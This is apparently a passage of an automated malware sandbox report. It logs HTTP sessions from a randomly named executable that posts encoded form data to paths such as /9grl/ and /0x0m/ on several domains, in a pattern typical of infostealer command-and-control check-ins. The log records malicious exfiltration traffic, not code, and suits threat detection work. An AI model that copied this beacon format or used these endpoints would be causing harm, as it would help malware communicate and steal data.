                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.kera333.org
                            Origin: http://www.kera333.org
                            Referer: http://www.kera333.org/9grl/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 79 2f 6b 39 46 33 4b 2b 47 34 4a 4d 50 78 63 73 4f 7a 43 5a 55 52 63 54 71 44 75 4a 36 64 54 6d 36 4d 4b 78 73 61 39 69 4c 4d 64 74 4f 50 51 6b 63 59 2b 6d 58 67 64 44 6b 67 4a 43 7a 6e 58 45 33 38 56 6f 38 2b 5a 53 58 65 6b 78 4d 58 70 4c 68 48 64 75 6d 4f 6f 2b 4c 39 76 6b 75 75 65 64 6e 44 41 76 39 43 71 4d 39 59 34 56 6b 53 51 5a 4f 6a 46 6b 72 34 34 65 37 4c 6a 38 66 58 78 54 56 46 43 47 34 4f 41 44 34 35 65 32 72 31 4e 35 31 58 67 6f 59 30 4e 76 5a 66 79 6a 33 45 6f 44 4c 4b 47 62 50 4e 2f 46 55 73 4b 73 52 36 76 45 71 7a 62 4e 59 6e 61 6b 39 44 76 44 51 62 66 49 30 71 4f 4f 42 75 70 51 6c 6c 4c 67 31 48 2b 6b 50 48 6a 5a 72 56 4d 3d
                            Data Ascii: UbV=y/k9F3K+G4JMPxcsOzCZURcTqDuJ6dTm6MKxsa9iLMdtOPQkcY+mXgdDkgJCznXE38Vo8+ZSXekxMXpLhHdumOo+L9vkuuednDAv9CqM9Y4VkSQZOjFkr44e7Lj8fXxTVFCG4OAD45e2r1N51XgoY0NvZfyj3EoDLKGbPN/FUsKsR6vEqzbNYnak9DvDQbfI0qOOBupQllLg1H+kPHjZrVM=
                            Jul 16, 2024 07:24:28.423260927 CEST479INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:28 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            43192.168.2.44978064.46.102.70801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:30.512422085 CEST10730OUTPOST /9grl/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.kera333.org
                            Origin: http://www.kera333.org
                            Referer: http://www.kera333.org/9grl/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 79 2f 6b 39 46 33 4b 2b 47 34 4a 4d 50 78 63 73 4f 7a 43 5a 55 52 63 54 71 44 75 4a 36 64 54 6d 36 4d 4b 78 73 61 39 69 4c 4e 6c 74 4f 39 59 6b 4f 70 2b 6d 57 67 64 44 6f 41 4a 48 7a 6e 58 4a 33 38 4e 57 38 2b 46 43 58 59 6f 78 65 6c 78 4c 30 43 78 75 70 4f 6f 2b 4a 39 76 6e 71 75 66 41 6e 44 52 6f 39 43 61 4d 39 59 34 56 6b 51 34 5a 4e 79 46 6b 70 34 34 66 74 62 6a 77 4a 58 77 30 56 46 61 38 34 4f 4e 34 34 71 57 32 71 56 64 35 6d 55 49 6f 52 30 4e 74 55 2f 79 37 33 45 6c 44 4c 4b 79 68 50 4d 61 4e 55 74 79 73 52 38 53 43 32 41 47 51 4e 45 6e 69 6f 54 69 6c 52 37 61 52 73 4c 65 61 50 2b 5a 70 79 30 6e 2f 39 46 33 73 56 31 65 63 77 68 6c 30 68 34 79 4c 36 63 45 57 50 58 59 64 42 6a 5a 71 4d 78 6a 69 54 6b 4a 70 57 50 59 46 70 50 4b 6b 4d 4e 56 33 4a 57 49 48 63 70 41 54 39 7a 35 39 6b 6a 50 2f 48 69 50 42 36 57 6b 42 35 56 5a 70 43 59 71 35 35 7a 48 52 6f 7a 77 43 39 48 53 30 74 4f 50 67 44 6f 64 36 57 49 41 4a 55 46 57 49 36 48 6a 71 72 32 5a 6f 75 42 54 79 5a 55 70 71 32 58 47 53 2b 42 [TRUNCATED]
                            Data Ascii: UbV=y/k9F3K+G4JMPxcsOzCZURcTqDuJ6dTm6MKxsa9iLNltO9YkOp+mWgdDoAJHznXJ38NW8+FCXYoxelxL0CxupOo+J9vnqufAnDRo9CaM9Y4VkQ4ZNyFkp44ftbjwJXw0VFa84ON44qW2qVd5mUIoR0NtU/y73ElDLKyhPMaNUtysR8SC2AGQNEnioTilR7aRsLeaP+Zpy0n/9F3sV1ecwhl0h4yL6cEWPXYdBjZqMxjiTkJpWPYFpPKkMNV3JWIHcpAT9z59kjP/HiPB6WkB5VZpCYq55zHRozwC9HS0tOPgDod6WIAJUFWI6Hjqr2ZouBTyZUpq2XGS+Byy/f0z65fDiFzn2jAbY7oLmxDKR/Q8bm/d9EefwmlM7hR9mY/rVSAIGHAMAIs906v0VrVZv8daqaqBu8fk9GR82MmutIOPbEpkh+DCP7ioIHrJ3jyVXZwuXGkDTblappP4ePFXl8xqrKlB9opPoWOvvXTymS5FQRJxO/XCPwuelmVlVx2bWE2/leToCGMEenFmHlkwp0rewsExS/i5zt6F0PGXlVTbKLgInoqq2mCAJcfqgwfY/7xRTEIOZGqIIheZ4GrVb+BbR2wADEpoqI32NxhD3IkzmpJlris4cI9g7txd6mY9gz8AWvtGnG+jGwtgkSSFUVkXk3fT8/EOaO/CYBLpWnbYz8kyfkreSSzY0W668Qzyn5WbzNO2EbGFiq8yWY8F8jO6NVSXTIJ3wXOwOtBHeV08Z22i+21DTHFJ4CfKC/W1AZEABvQJNjJek5WRu/gw4HC2wNI/IZk4yGu+dd5cv9uT2us818TU8HdZhNnk3c32rRtuxy70UZV3j15djXVXPqblkm2cqNVcuUF8chESCQuAqBZ4wRBwcqPe0XQMMQ0l7UMUDQSYfdmKpyLllLQzmo/J2YAmtL3txjIcDbRnc1eSzREZb9cLuY/f+Z1d40L4ryhNuPwBD81Y4+VIWV+L/Y+c/MtgK9M4zxnHHJR5Tw0MkY2G [TRUNCATED]
                            Jul 16, 2024 07:24:30.956948996 CEST479INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:30 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            44192.168.2.44978164.46.102.70801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:33.047720909 CEST365OUTGET /9grl/?UbV=/9MdGCeeA5FyGWImDjb6SSoEi2eI86nByvS7j/dpG/wpEvIodpeda31qunpqinbT/PdN7YoBB4YXLVBs6DMrn+UTK6ScrsDz3wZvnBGs6Z4ywzADABVVsu0=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.kera333.org
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:24:33.495090961 CEST479INHTTP/1.1 404 Not Found
                            Date: Tue, 16 Jul 2024 05:24:33 GMT
                            Server: Apache
                            Content-Length: 315
                            Connection: close
                            Content-Type: text/html; charset=iso-8859-1
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            45192.168.2.4497823.33.130.190801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:38.550257921 CEST634OUTPOST /0x0m/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.lmsforsme.com
                            Origin: http://www.lmsforsme.com
                            Referer: http://www.lmsforsme.com/0x0m/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 56 55 76 4e 34 72 55 2f 31 69 59 33 61 39 4c 77 37 75 6f 63 7a 30 4b 4c 58 75 6f 6d 7a 4a 53 38 5a 67 59 51 59 6e 71 59 45 39 53 61 50 7a 37 41 70 43 5a 78 43 75 4f 64 71 5a 2f 4c 66 72 5a 70 6a 58 7a 66 76 46 46 78 34 55 57 55 58 38 67 77 34 35 65 75 75 32 45 75 6e 38 52 45 42 6a 66 6e 33 46 49 35 72 7a 52 6a 72 47 4c 52 61 4f 4e 7a 44 63 62 59 46 4c 61 2f 53 62 58 72 39 44 2f 70 61 70 4d 42 34 59 73 48 74 79 72 31 58 7a 50 34 69 69 54 37 71 4c 64 70 57 44 58 50 45 4b 62 46 4a 4a 74 6b 62 38 32 4e 67 78 48 61 2b 79 37 33 2b 43 4b 7a 30 34 74 44 31 35 57 51 71 68 63 4b 31 51 3d 3d
                            Data Ascii: UbV=VUvN4rU/1iY3a9Lw7uocz0KLXuomzJS8ZgYQYnqYE9SaPz7ApCZxCuOdqZ/LfrZpjXzfvFFx4UWUX8gw45euu2Eun8REBjfn3FI5rzRjrGLRaONzDcbYFLa/SbXr9D/papMB4YsHtyr1XzP4iiT7qLdpWDXPEKbFJJtkb82NgxHa+y73+CKz04tD15WQqhcK1Q==


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            46192.168.2.4497833.33.130.190801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:41.226093054 CEST654OUTPOST /0x0m/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.lmsforsme.com
                            Origin: http://www.lmsforsme.com
                            Referer: http://www.lmsforsme.com/0x0m/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 56 55 76 4e 34 72 55 2f 31 69 59 33 5a 64 37 77 6f 5a 30 63 6a 6b 4b 49 53 75 6f 6d 6b 5a 53 34 5a 67 6b 51 59 6d 75 79 45 4c 71 61 4f 53 72 41 6f 48 74 78 4d 4f 4f 64 69 35 2f 4f 48 4c 5a 75 6a 58 50 39 76 41 6c 78 34 55 71 55 58 39 38 77 34 75 71 74 76 6d 45 73 73 63 52 47 4d 44 66 6e 33 46 49 35 72 7a 73 49 72 47 44 52 61 2b 39 7a 43 34 76 62 44 37 61 77 56 62 58 72 73 7a 2f 31 61 70 4d 5a 34 5a 41 68 74 77 54 31 58 79 2f 34 69 7a 54 30 2f 62 64 72 53 44 57 73 4e 65 43 33 4a 4e 30 52 46 4e 65 2b 73 43 72 34 32 55 71 74 76 7a 72 6b 6d 34 4a 77 6f 2b 66 6b 6e 69 68 44 75 63 42 5a 66 48 66 74 57 4a 7a 67 58 42 32 38 31 53 69 2b 6d 30 6f 3d
                            Data Ascii: UbV=VUvN4rU/1iY3Zd7woZ0cjkKISuomkZS4ZgkQYmuyELqaOSrAoHtxMOOdi5/OHLZujXP9vAlx4UqUX98w4uqtvmEsscRGMDfn3FI5rzsIrGDRa+9zC4vbD7awVbXrsz/1apMZ4ZAhtwT1Xy/4izT0/bdrSDWsNeC3JN0RFNe+sCr42Uqtvzrkm4Jwo+fknihDucBZfHftWJzgXB281Si+m0o=


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            47192.168.2.4497843.33.130.190801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:43.766119003 CEST10736OUTPOST /0x0m/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 10300
                            Cache-Control: max-age=0
                            Host: www.lmsforsme.com
                            Origin: http://www.lmsforsme.com
                            Referer: http://www.lmsforsme.com/0x0m/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 56 55 76 4e 34 72 55 2f 31 69 59 33 5a 64 37 77 6f 5a 30 63 6a 6b 4b 49 53 75 6f 6d 6b 5a 53 34 5a 67 6b 51 59 6d 75 79 45 49 4b 61 4f 67 7a 41 70 6b 46 78 50 4f 4f 64 6f 5a 2f 50 48 4c 5a 2f 6a 54 62 35 76 41 68 4c 34 53 6d 55 57 66 30 77 74 71 32 74 68 6d 45 73 6a 38 52 4c 42 6a 65 36 33 46 59 39 72 7a 63 49 72 47 44 52 61 39 6c 7a 53 63 62 62 42 37 61 2f 53 62 58 76 39 44 2f 4a 61 70 55 4a 34 5a 45 58 74 45 6e 31 55 52 48 34 6c 42 4c 30 69 72 64 74 58 44 57 4b 4e 62 61 73 4a 4d 64 75 46 4e 62 32 73 42 33 34 30 7a 53 32 32 79 7a 41 37 61 42 6f 79 4e 2b 47 67 42 38 50 72 72 56 31 65 43 62 56 4c 71 7a 44 5a 79 50 49 73 43 32 71 39 79 6b 38 31 4d 33 4a 44 61 6c 31 6a 65 56 4f 6f 54 76 51 7a 7a 71 54 54 52 51 59 48 41 78 6a 77 63 69 76 65 2f 69 5a 37 64 6f 48 67 4c 58 6d 33 70 6c 6a 57 57 59 57 52 41 71 6b 38 76 67 31 32 32 39 63 4b 45 65 79 54 4d 78 57 6a 63 2b 2b 6f 30 47 75 51 69 6a 58 69 43 77 58 31 6d 39 45 65 51 5a 76 46 79 35 6c 79 5a 4d 4c 7a 58 46 79 4f 77 7a 6f 4e 35 74 57 51 69 [TRUNCATED]
                            Data Ascii: UbV=VUvN4rU/1iY3Zd7woZ0cjkKISuomkZS4ZgkQYmuyEIKaOgzApkFxPOOdoZ/PHLZ/jTb5vAhL4SmUWf0wtq2thmEsj8RLBje63FY9rzcIrGDRa9lzScbbB7a/SbXv9D/JapUJ4ZEXtEn1URH4lBL0irdtXDWKNbasJMduFNb2sB340zS22yzA7aBoyN+GgB8PrrV1eCbVLqzDZyPIsC2q9yk81M3JDal1jeVOoTvQzzqTTRQYHAxjwcive/iZ7doHgLXm3pljWWYWRAqk8vg1229cKEeyTMxWjc++o0GuQijXiCwX1m9EeQZvFy5lyZMLzXFyOwzoN5tWQiLa1iM1Qs1GE2fIKKEXh28e80scWv10PRG8n0szTpbZFgOfyf2kNgmBUMAGNXnyh1PWY4fTXdbWKubkycU+DSmYcf+fo+PqXMohNYgdxfdEH03q/Ndjq/Uemul7McxdxBtFV+EhPL8AV4g5U8dnF2Qr9y91Iyqf4TdHXwooePNnrvWyLwxhQOIKLtCahFLDLG97anLrJJcxl3QE4NjORTXYjRMxHbtDlR/S9RQ6HGEHkjfTfR3Qri+6H+NwAkObnSBncMpIrCFtt6b3KI/mFCXT2X9MrBZghHlpI+GRADZVCtv+yhDmUrHtM0cmEkmAYOw9WJ8K7lsBmjTd+REW1TKQYsYYPAnu8W9U5zjncrsRPQxVhJvH22g0ahVpxlJQdPQU+L55MRxgHT/OE8wIldtNMBq2CzFI/CUUhi7SUomA0/IxoRXcsblFXE9QasImNinLgr7cSq6eHyQsrHXh36GQpu1g7cXViXQeo59kDDD+Q2rA1A/QGu8U/LdIUHws/4/pnl/QkM3CHAW6ezReVS6x1qGeShFVVFPa/IG6kDbEm2qEdRGccOIQWZ5cnfVfv/TCiXHx4l2sCEdnalOYoauNacYzu8inB+BjE5l1oOe3kfC5XFUbn+DEPFIwB4o7QkTLD4eZeijkw7KpLUZvdY7yTicdbAhmnw3+ [TRUNCATED]


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            48192.168.2.4497853.33.130.190801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:46.292792082 CEST367OUTGET /0x0m/?UbV=YWHt7d8s1wtxEc6N7JBdk3GvQZUe6qigJh5gb0SeLYvcAy/h2X15EObbup3pZ5JIlELN4AUs60aWctEAjqiruE1aq+9hFwKJnnwArXASsnPjRvxDOp7wEtw=&Y4gp=mlltcrRxcL HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Connection: close
                            Host: www.lmsforsme.com
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Jul 16, 2024 07:24:46.751651049 CEST395INHTTP/1.1 200 OK
                            Server: openresty
                            Date: Tue, 16 Jul 2024 05:24:46 GMT
                            Content-Type: text/html
                            Content-Length: 255
                            Connection: close
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 62 56 3d 59 57 48 74 37 64 38 73 31 77 74 78 45 63 36 4e 37 4a 42 64 6b 33 47 76 51 5a 55 65 36 71 69 67 4a 68 35 67 62 30 53 65 4c 59 76 63 41 79 2f 68 32 58 31 35 45 4f 62 62 75 70 33 70 5a 35 4a 49 6c 45 4c 4e 34 41 55 73 36 30 61 57 63 74 45 41 6a 71 69 72 75 45 31 61 71 2b 39 68 46 77 4b 4a 6e 6e 77 41 72 58 41 53 73 6e 50 6a 52 76 78 44 4f 70 37 77 45 74 77 3d 26 59 34 67 70 3d 6d 6c 6c 74 63 72 52 78 63 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?UbV=YWHt7d8s1wtxEc6N7JBdk3GvQZUe6qigJh5gb0SeLYvcAy/h2X15EObbup3pZ5JIlELN4AUs60aWctEAjqiruE1aq+9hFwKJnnwArXASsnPjRvxDOp7wEtw=&Y4gp=mlltcrRxcL"}</script></head></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            49192.168.2.44978623.105.215.248801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:52.193397999 CEST640OUTPOST /fl6s/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 200
                            Cache-Control: max-age=0
                            Host: www.3333711m14.shop
                            Origin: http://www.3333711m14.shop
                            Referer: http://www.3333711m14.shop/fl6s/
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                            Data Raw: 55 62 56 3d 4e 32 5a 6c 34 48 5a 54 4e 76 53 51 4b 55 48 4d 6a 67 34 63 2f 47 4d 68 74 47 7a 4b 6b 75 2b 71 6f 6f 47 42 34 30 79 56 66 4a 37 55 57 72 75 57 55 59 48 57 50 6e 73 35 51 38 31 56 32 51 53 6c 35 36 36 44 4c 41 4f 4b 4d 72 4a 39 44 4c 42 62 64 57 6a 42 32 68 39 34 52 48 77 57 45 72 33 68 72 4f 4f 57 2f 6a 55 69 31 2b 62 67 76 62 41 34 4d 64 72 56 31 59 79 6e 55 4e 66 35 6f 66 62 58 56 75 75 64 68 73 37 43 49 6e 4a 36 43 4c 62 4b 79 74 6f 34 39 4e 49 43 6e 56 47 56 57 4c 42 38 4b 47 46 59 35 71 62 42 6d 70 57 34 68 64 59 35 57 54 54 6f 52 6f 6f 73 5a 5a 55 39 6d 36 66 44 2b 51 3d 3d
                            Data Ascii: UbV=N2Zl4HZTNvSQKUHMjg4c/GMhtGzKku+qooGB40yVfJ7UWruWUYHWPns5Q81V2QSl566DLAOKMrJ9DLBbdWjB2h94RHwWEr3hrOOW/jUi1+bgvbA4MdrV1YynUNf5ofbXVuudhs7CInJ6CLbKyto49NICnVGVWLB8KGFY5qbBmpW4hdY5WTToRoosZZU9m6fD+Q==
                            Jul 16, 2024 07:24:52.797907114 CEST691INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Tue, 16 Jul 2024 05:24:52 GMT
                            Content-Type: text/html
                            Content-Length: 548
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            50192.168.2.44978723.105.215.248801668C:\Program Files (x86)\gvHJNPWMIowLhcYBdQucSvTqkiHpoHsZsEOeDZZQxshkxJLFwYv\rULxYvbAFLatPN.exe
                            TimestampBytes transferredDirectionData
                            Jul 16, 2024 07:24:54.731209040 CEST660OUTPOST /fl6s/ HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate, br
                            Connection: close
                            Content-Type: application/x-www-form-urlencoded
                            Content-Length: 220
                            Cache-Control: max-age=0
                            Host: www.3333711m14.shop
